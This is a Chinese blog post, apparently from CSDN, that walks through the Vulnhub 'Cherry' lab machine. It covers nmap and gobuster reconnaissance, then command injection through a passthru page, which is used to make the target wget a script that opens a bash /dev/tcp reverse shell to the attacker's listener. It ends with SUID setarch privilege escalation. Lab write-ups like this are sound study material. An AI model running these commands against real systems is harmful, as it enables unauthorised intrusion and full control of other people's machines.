靶机8:Cherry

已于 2023-11-10 15:38:11 修改
阅读量50 收藏
点赞数
分类专栏: 靶机 文章标签: 网络
于 2023-10-20 20:37:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wj33333/article/details/133801430
版权

Cherry(樱桃)

难点:靶机植入文件

1.信息收集

nmap 扫描
nmap -sS 192.168.221.0/24 -T4                半开扫描,找到靶机

nmap -sV -p- 192.168.221.133 -T4        全端口扫描,扫描出未发现的端口

利用80端口收集网页信息

未发现可用信息

查看7755端口

同样未发现有用信息

2.目录扫描

/usr/share/wordlists/dirbuster

gobuster dir -w directory-list-2.3-medium.txt -x html -u http://192.168.221.133:7755/

查看http://192.168.221.133:7755/backup/

查看每个目录

http://192.168.221.133:7755/backup/command.php

发现passthru函数

3.文件植入

我们可以试试反弹shell

在/tmp/下创建一个以.sh结尾的文件
#!/bin/bash
 bash -i >& /dev/tcp/192.168.221.134/8888 0>&1

开启80端口
python3 -m http.server 80

在靶机植入文件
http://192.168.221.133:7755/backup/command.php?backup= wget-O/tmp/shell.sh http://192.168.221.134/tmp/shell.sh

查看

下载成功

kali监听
nc -lvp 8888

运行
http://192.168.221.133:7755/backup/command.php?backup=bash /tmp/shell.sh
kali反弹成功

4.SUID提权

查找可提权命令
find / -perm -u=s -type f 2>/dev/null

发现setarch可以提权
setarch $(arch) /bin/sh -p            提权方式

成功

wj33333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机渗透测试(cherry:1)
@小张小张的博客
10-26 1074
靶机渗透测试(HA: NARAK): Vulnhub靶机 HA: NARAK 靶机:修改靶机网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Intermediate–Hard) 目标:Boot to Root .Your target is gain the Root access 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令: netdiscover -i eth0 -r 192.168.10.
【vulnhub】Cherry靶机
Nicky_Zheng的博客
02-01 419
1、信息收集 1.1、网段扫描 通过使用netdiscover 发现靶机ip为:192.168.57.141 1.2、端口扫描 使用nmap对靶机进行全端口扫描,同时启用服务探测、OS探测 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-25 14:12 CST
DC-4靶机
mlws1900的博客
03-24 1032
下载不下来用迅雷下载。
1. LAMPSecurity-CTF8靶机复现
Sam5ara的博客
12-05 1916
vulnhub
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu)
02-18
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu),真实有效,如有侵权,请联系csdn删除即可
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
k8s环境部署dvwa靶机
09-01
k8s环境部署dvwa靶机
SSH 和 Telnet 之间的区别
ITmoster的博客
08-08 373
SSH 和 Telnet是帮助用户与远程系统建立连接的两种通信协议,这些通信协议决定了数据如何在网络上的不同设备之间传输,这些设备通常需要通过各种物理和数字环境进行传输,网络协议的主要目标是通信、网络管理和安全。
深度解密CRLF注入与重定向漏洞:从原理到实践
2301_80064376的博客
08-08 894
重定向漏洞(Open Redirect)是一种安全漏洞,攻击者可以利用它将用户从受信任的网站重定向到恶意网站。这种漏洞通常出现在网站处理 URL 参数时,没有对用户输入进行适当验证。
开发android app用于移远模块读写IMEI 模组EC200DEULA-D08-SNNDA 支持socket连接读写IMEI
chenhao0568的专栏
08-07 383
发送{“function”: “write_imei”,“imei”: “860004050179648”}响应{“message”: “success”,“imei”: “860004050179648”}当结果正常时message为success,否则message给出英文具体原因,其它参数可能为空。发送{“function”: “read_imei”}响应{“message”: “success”}前面本地5902 转发到 后面设备为5902。PC与终端APP之间 json通信协议。
HAProxy基本配置及参数实操
Webston的博客
08-12 764
静态#动态#以下静态和动态取决于hash_type 是否consistentfirst #使用较少static-rr #做了session 共享的web集群leastconn #数据库source#基于客户端公网IP 的会话保持Uri--------------->http #缓存服务器,CDN服务商,蓝汛、百度、阿里云、腾讯url_param--------->http #可以实现session 保持hdr #基于客户端请求报文头部做下一步处理高。
OSPF小实验
sgdhshshhs的博客
08-07 402
【代码】OSPF小实验。
mpls vpn基础实验
wudongfang666的专栏
08-10 465
场景:异地两个站点通过mpls vpn骨干网络实现安全通讯虚拟路由转发 VRF ,相当于在设备内建立一条虚拟通道,一个vpn的实例(vrf)可以简单的理解为一台虚拟设备。拓扑图。
48天笔试训练错题——day44
ミカミミミ博客
08-08 818
48天笔试训练错题——day44.
Netty原理及实战应用(下篇)
最新发布
program哲学
08-12 23
本文详细介绍了netty关于websocket集成、消息推送应用、网络连接编解码等方面的内容
48天笔试训练错题——day43
ミカミミミ博客
08-07 884
48天笔试训练错题——day43.
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值